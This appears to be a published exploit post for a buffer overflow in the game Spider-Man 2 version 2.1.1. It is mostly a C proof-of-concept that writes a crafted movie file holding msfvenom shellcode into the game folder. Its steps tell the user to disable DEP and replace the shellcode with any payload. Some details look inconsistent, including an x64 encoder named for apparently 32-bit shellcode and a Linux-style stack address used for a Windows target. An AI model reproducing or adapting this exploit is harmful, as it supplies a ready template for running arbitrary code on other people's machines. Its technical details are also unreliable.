Spiderman2 2.1.1 Buffer Overflow ↭ – Digitalmunition





Published on April 21st, 2020


# Exploit Title: Spiderman2 – Buffer Overflow
# Exploit Author: HexraiN
# Vendor Homepage: https://www.mobygames.com/company/fizz-factor
# Software Link: https://www.mobygames.com/game/spider-man-2-the-game
# Version: 2.1.1
# Tested on: Windows 10 x64
# Greetz : OA Cybersecurity Labs

#Twitter : @smashedkernel

# 1 -> Disable DEP for Spiderman.exe
# 2 -> Remove <your Spiderman installation folder>/Movies/ACTIVISN.bik
# 3 -> Change the shellcode with the one you want
# 4 -> Change "installation_path" by yourself.
# 5 -> Compile & Run PoC
# 6 -> Run Game Spiderman.exe
# 7 -> Boom

#include <stdio.h>
#include <string.h>

// msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c -v
// SIZE = 192 Bytes
unsigned char shellcode[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x6e\x6f\x74\x65\x70\x61\x64\x00";

int main(void)
{
    // Step 4: set installation_path to the local install directory.
    char installation_path[260] = "C:\\Program Files(x86)\\Activision\\Spider-Man 2";
    // Append the path of the file removed in step 2.
    strcat(installation_path, "\\Movies\\ACTIVISN.bik");

    char buffer[421];
    FILE *vulnerable;

    // Fill the whole buffer with NOPs (0x90).
    memset(buffer, 0x90, sizeof(buffer));

    // address to insert into eip == address of local buffer in bof + ~192 bytes into nops
    long addr = 0xbffff240 + 0xc0;
    // buffer offset at 28 = location of rip register
    memcpy(buffer + 28, &addr, sizeof(long));

    // Place the shellcode at the end of the buffer.
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode) - 1, shellcode, sizeof(shellcode));

    vulnerable = fopen(installation_path, "w");
    if (vulnerable == NULL) {
        perror("fopen");
        return 1;
    }
    fwrite(buffer, sizeof(buffer), 1, vulnerable);
    fclose(vulnerable);
    return 0;
}
